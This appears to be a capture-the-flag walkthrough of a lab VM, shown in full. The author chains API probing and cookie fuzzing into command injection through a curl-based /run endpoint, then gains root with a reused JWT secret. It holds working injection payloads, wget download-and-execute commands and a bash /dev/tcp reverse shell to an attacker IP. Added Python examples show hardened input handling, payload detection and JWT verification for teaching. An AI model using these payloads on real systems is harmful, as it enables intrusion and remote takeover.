# Target setup
Download the VM and import it directly; it works as-is.
IP: 192.168.1.137
# Penetration process
# Initial information gathering
```text
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http nginx 1.14.2
8080/tcp open http nginx 1.14.2
```
# http://192.168.1.137:8080/
```text
[10:55:39] 200 - 2KB - /01
[10:55:39] 200 - 2KB - /1
[10:55:39] 200 - 2KB - /02
[10:55:39] 200 - 2KB - /04
[10:55:40] 200 - 2KB - /2
[10:55:41] 200 - 2KB - /4
[10:56:24] 405 - 64B - /login
[10:56:40] 200 - 29B - /registration
[10:56:41] 405 - 178B - /run
[10:56:42] 500 - 37B - /secret
[10:56:50] 200 - 17B - /test
[10:56:54] 200 - 140B - /users
```

The /users endpoint returns:

```json
{"users": [{"username": "patrick", "password": "$pbkdf2-sha256$29000$e0/J.V.rVSol5HxPqdW6Nw$FZJVgjNJIw99RIiojrT/gn9xRr9SI/RYn.CGf84r040"}]}
```
# API testing
Looking around, these are just API endpoints, so I tested them in Burp based on the responses.
I tried logging in with the given username and password but got nowhere, so I registered an account first to see how things work. I sent the following request:
```http
POST /registration HTTP/1.1
Host: 192.168.1.137:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 21

username=1&password=1
```
Got the following back:
```http
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Sun, 05 May 2024 03:18:21 GMT
Content-Type: application/json
Content-Length: 355
Connection: close

{"message": "User 1 was created. Please use the login API to log in!", "access_token": "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTcxNDg3OTEwMSwianRpIjoiOGJkZGNhMmEtY2I3ZC00MmZjLTk3NzUtMGY4NjNhNTZlYTMxIiwidHlwZSI6ImFjY2VzcyIsInN1YiI6IjEiLCJuYmYiOjE3MTQ4NzkxMDEsImV4cCI6MTcxNDg4MDAwMX0.FVCqQo9SJPzLQybBsVwCw4WAaZUtkIQR5j-Y0mwUy30"}
```
Log in with this account:
```http
POST /login HTTP/1.1
Host: 192.168.1.137:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 21

username=1&password=1
```
Got the tokens (the access token is what goes into the cookie later):
```http
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Sun, 05 May 2024 03:28:37 GMT
Content-Type: application/json
Content-Length: 600
Connection: close

{"message": "Logged in as 1", "access_token": "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTcxNDg3OTcxNywianRpIjoiNjdhNGM1OGUtMTIwYS00NDYwLTg2OWMtODJmZTU2ZjMxODFlIiwidHlwZSI6ImFjY2VzcyIsInN1YiI6IjEiLCJuYmYiOjE3MTQ4Nzk3MTcsImV4cCI6MTcxNDg4MDYxN30.5ipYzn89OxZoXKNv5BbXznQROQjGuICIYZMOVl89LVE", "refresh_token": "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTcxNDg3OTcxNywianRpIjoiNDhmOWQxZTMtNjg4ZC00YWQyLWI1NzctZjhhOTczNTcxOWFjIiwidHlwZSI6InJlZnJlc2giLCJzdWIiOiIxIiwibmJmIjoxNzE0ODc5NzE3LCJleHAiOjE3MTQ4ODMzMTd9.duC7xa7rPSjsLZpGu22Hw23t4jdDO1N5JgZapbAQidM"}
```
Next I looked at the run endpoint. From the hint it felt like RCE. Since the responses come back as JSON, I guessed the request body has to be JSON too, and submitted {"url":"127.0.0.1:8080"}. That revealed a secret key is also required, which immediately pointed at the secret page.

Opening it gave a 500. Combined with the earlier information it presumably needs the cookie, but I didn't know the cookie field name, so I had to fuzz it. It shouldn't be anything complicated, and the field name turned out to be access_token_cookie. Sending the cookie returned secret_key: commandexecutionissecret
```http
GET /secret HTTP/1.1
Host: 192.168.1.137:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Cookie: access_token_cookie=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTcxNDg3OTcxNywianRpIjoiNjdhNGM1OGUtMTIwYS00NDYwLTg2OWMtODJmZTU2ZjMxODFlIiwidHlwZSI6ImFjY2VzcyIsInN1YiI6IjEiLCJuYmYiOjE3MTQ4Nzk3MTcsImV4cCI6MTcxNDg4MDYxN30.5ipYzn89OxZoXKNv5BbXznQROQjGuICIYZMOVl89LVE
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
```

```http
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Sun, 05 May 2024 03:35:25 GMT
Content-Type: application/json
Content-Length: 61
Connection: close
Set-Cookie: access_token_cookie=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTcxNDg4MDEyNSwianRpIjoiZTlmZWQ0ZjUtZjM2Ny00NWQwLWI4ZTgtZjY1YzMwZmRlN2NmIiwidHlwZSI6ImFjY2VzcyIsInN1YiI6IjEiLCJuYmYiOjE3MTQ4ODAxMjUsImV4cCI6MTcxNDg4MTAyNX0.z-n754xqTpvCmTqnbZNTePOgmkNVZW8MNxWCjeJ9-Uk; Secure; HttpOnly; Path=/

{"ip-address": "", "secret_key": "commandexecutionissecret"}
```
Then go back to the run endpoint, add the secret_key, and it executes:
```http
POST /run HTTP/1.1
Host: 192.168.1.137:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/json
Content-Length: 109

{"url":"127.0.0.1:80",
"secret_key":"commandexecutionissecret"}
```
# RCE
After running it, the output showed it was a curl command, so command execution came to mind; time to inject into it:

```json
{"url":"$(whoami).fag8yp.dnslog.cn","secret_key":"commandexecutionissecret"}
```

That confirmed command execution works. I tried a reverse shell but it got banned straight away; presumably there is keyword filtering. Lovely.
So upload a shell.sh and pop the shell from that instead.
shell.sh is as follows:
```bash
#!/bin/bash
bash -i >& /dev/tcp/192.168.1.129/4444 0>&1
```
The submitted commands were:
```json
{"url":"`wget http://192.168.1.129/shell.txt -O shell.sh`.fag8yp.dnslog.cn","secret_key":"commandexecutionissecret"}
{"url":"`chmod +x shell.sh`.fag8yp.dnslog.cn","secret_key":"commandexecutionissecret"}
{"url":"`./shell.sh`.fag8yp.dnslog.cn","secret_key":"commandexecutionissecret"}
```
OK folks, the shell came back.
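The root cause of the RCE above is that the `url` value is dropped into a shell command string, so `$(...)` and backticks are evaluated before curl ever sees the URL. The following is an added example, not code from the original writeup or from the target application (whose source is not on the page, so the handler shape is an assumption): the vulnerable pattern, a hardened replacement that validates the URL and passes it as a single argv element, and a small detector that flags request bodies carrying the same payload shape. The sample bodies are constructed from the payloads shown above plus one benign request.

```python
# Added example (not from the original writeup): vulnerable vs hardened /run
# handling, plus detection over request bodies. Handler shape is assumed.
import ipaddress
import json
import re
from urllib.parse import urlsplit

# Characters that let a "url" value escape into shell syntax once the value is
# interpolated into a command string. Backticks and $(...) are what the
# writeup used; the rest are the usual separators, redirections and whitespace.
SHELL_META = re.compile(r"[`$;|&<>(){}\s]")


def vulnerable_command(url: str) -> str:
    """The pattern the observed behaviour implies: the user value is pasted
    into a shell string. Returned here as a string rather than executed; the
    real app would hand it to a shell (e.g. subprocess.run(cmd, shell=True)),
    which is where `$(whoami)` gets evaluated."""
    return f"curl {url}"


def hardened_command(url: str, timeout: int = 5) -> list:
    """Validate the value as an http(s) URL to a non-internal host, then build
    an argv list so no shell ever parses attacker-controlled text.
    Raises ValueError on anything that does not pass."""
    if SHELL_META.search(url):
        raise ValueError("shell metacharacters rejected")
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        raise ValueError("only http/https URLs are allowed")
    host = parts.hostname
    if not host:
        raise ValueError("missing host")
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        ip = None  # a hostname rather than an IP literal
    if ip is not None and (ip.is_private or ip.is_loopback or ip.is_link_local):
        # Blocks the 127.0.0.1 probing seen in the writeup. A hostname that
        # resolves to an internal address still needs a check at resolve time.
        raise ValueError("internal addresses are not allowed")
    # argv form: curl receives the URL as one argument; nothing is re-parsed.
    return ["curl", "--max-time", str(timeout), "--", url]


def is_allowed(url: str) -> bool:
    """True if the hardened handler would accept this url value."""
    try:
        hardened_command(url)
        return True
    except ValueError:
        return False


def flag_run_bodies(bodies: list) -> list:
    """Detection side: given raw JSON request bodies sent to /run, return the
    url values that the hardened validation would reject. Malformed bodies
    are skipped rather than treated as hits."""
    flagged = []
    for raw in bodies:
        try:
            url = json.loads(raw).get("url", "")
        except (ValueError, AttributeError):
            continue
        if not isinstance(url, str) or not is_allowed(url):
            flagged.append(url)
    return flagged


# Constructed sample bodies: the writeup's payloads plus one benign request.
SAMPLE_BODIES = [
    '{"url":"http://example.com/health","secret_key":"x"}',
    '{"url":"127.0.0.1:8080","secret_key":"x"}',
    '{"url":"$(whoami).fag8yp.dnslog.cn","secret_key":"x"}',
    '{"url":"`./shell.sh`.fag8yp.dnslog.cn","secret_key":"x"}',
]

if __name__ == "__main__":
    print("shell string built by the vulnerable pattern:",
          vulnerable_command("$(whoami).fag8yp.dnslog.cn"))
    print("argv built by the hardened handler:",
          hardened_command("http://example.com/health"))
    for u in flag_run_bodies(SAMPLE_BODIES):
        print("flagged:", u)
```

The argv list is the part that matters: with `shell=False` the string `$(whoami)` is just bytes in an argument, not syntax. The metacharacter filter on top is defence in depth and doubles as a cheap detection rule for the request log; the keyword ban the writeup ran into is exactly that kind of filter, and the writeup shows why a filter alone is not enough.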
# Privilege escalation
Poking around the directories:
```python
app.config['SECRET_KEY'] = 'snakeoilisnotgoodforcorporations'
app.config['JWT_SECRET_KEY'] = 'NOreasonableDOUBTthisPASSWORDisGOOD'
```
Two candidate passwords. The second one turned out to be the account's password, so a plain sudo su
gives us root.
# Summary
API testing + command execution
JWT_SECRET_KEY is the key for JSON Web Tokens (JWT). When JWTs are used for authentication and authorization, a key is needed to sign and verify the tokens. It just happens that here it is the same as patrick's password.
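To make the last point concrete, here is an added example (not code from the writeup or the target app): a minimal HS256 JWT decode/sign/verify built only on the standard library. It decodes the access token that /registration returned above to show the claims are plain base64url text with no confidentiality at all, and it does a signing round-trip with a constructed key to show exactly what JWT_SECRET_KEY protects: anyone holding it can mint a token for any `sub`, which is why it must be a random high-entropy value and never a reused password. The verifier pins the algorithm to HS256 and checks `nbf`/`exp`, the two checks most often missing from hand-rolled JWT code. The signing key and claims used in the round-trip are constructed for this example.

```python
# Added example (not from the original writeup): stdlib-only HS256 JWT helpers.
import base64
import hashlib
import hmac
import json

# Access token returned by /registration in the writeup (a real page value).
PAGE_ACCESS_TOKEN = (
    "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9."
    "eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTcxNDg3OTEwMSwianRpIjoiOGJkZGNhMmEtY2I3ZC00MmZjLTk3NzUtMGY4NjNhNTZlYTMxIiwidHlwZSI6ImFjY2VzcyIsInN1YiI6IjEiLCJuYmYiOjE3MTQ4NzkxMDEsImV4cCI6MTcxNDg4MDAwMX0."
    "FVCqQo9SJPzLQybBsVwCw4WAaZUtkIQR5j-Y0mwUy30"
)


def _b64url_decode(s: str) -> bytes:
    # JWT segments drop the '=' padding; restore it before decoding.
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def _b64url_encode(b: bytes) -> str:
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()


def decode_unverified(token: str) -> tuple:
    """Header and payload as dicts. No key needed: this is why a JWT must
    never carry secrets in its claims."""
    header, payload, _sig = token.split(".")
    return json.loads(_b64url_decode(header)), json.loads(_b64url_decode(payload))


def sign_hs256(payload: dict, key: str) -> str:
    """What the server does with JWT_SECRET_KEY: HMAC-SHA256 over
    '<header>.<payload>'. Whoever holds the key can produce this for any sub."""
    header = _b64url_encode(json.dumps({"typ": "JWT", "alg": "HS256"}, separators=(",", ":")).encode())
    body = _b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    sig = hmac.new(key.encode(), f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{_b64url_encode(sig)}"


def verify_hs256(token: str, key: str, now: int) -> dict:
    """Return the payload if the token is valid at time `now`, else raise.
    Pins alg to HS256 (rejects 'none'), uses a constant-time compare, and
    enforces nbf/exp."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("malformed token")
    header, payload = decode_unverified(token)
    if header.get("alg") != "HS256":
        raise ValueError("unexpected alg")
    expected = hmac.new(key.encode(), f"{parts[0]}.{parts[1]}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_decode(parts[2])):
        raise ValueError("bad signature")
    if payload.get("nbf", 0) > now:
        raise ValueError("token not yet valid")
    if payload.get("exp", float("inf")) <= now:
        raise ValueError("token expired")
    return payload


def is_valid(token: str, key: str, now: int) -> bool:
    try:
        verify_hs256(token, key, now)
        return True
    except ValueError:
        return False


def access_lifetime_seconds(token: str) -> int:
    """exp - iat of a token, read without verification."""
    _header, payload = decode_unverified(token)
    return payload["exp"] - payload["iat"]


if __name__ == "__main__":
    hdr, claims = decode_unverified(PAGE_ACCESS_TOKEN)
    print("header:", hdr)
    print("claims:", claims, "lifetime:", access_lifetime_seconds(PAGE_ACCESS_TOKEN), "s")
    # Constructed key and claims for the round-trip demonstration.
    tok = sign_hs256({"sub": "1", "iat": 1000, "exp": 1900}, "constructed-test-key")
    print("round-trip valid:", is_valid(tok, "constructed-test-key", now=1500))
    print("wrong key valid:", is_valid(tok, "wrong-key", now=1500))
```

Reading the page's token this way shows a 15-minute access token (`exp - iat` = 900 s) with `sub` = "1", which is the cookie value the /secret endpoint trusts. Everything that stops someone else from producing an equally valid cookie is the HMAC key, so a key that doubles as a human password on the same box (as in this writeup) collapses two separate trust boundaries into one guessable string.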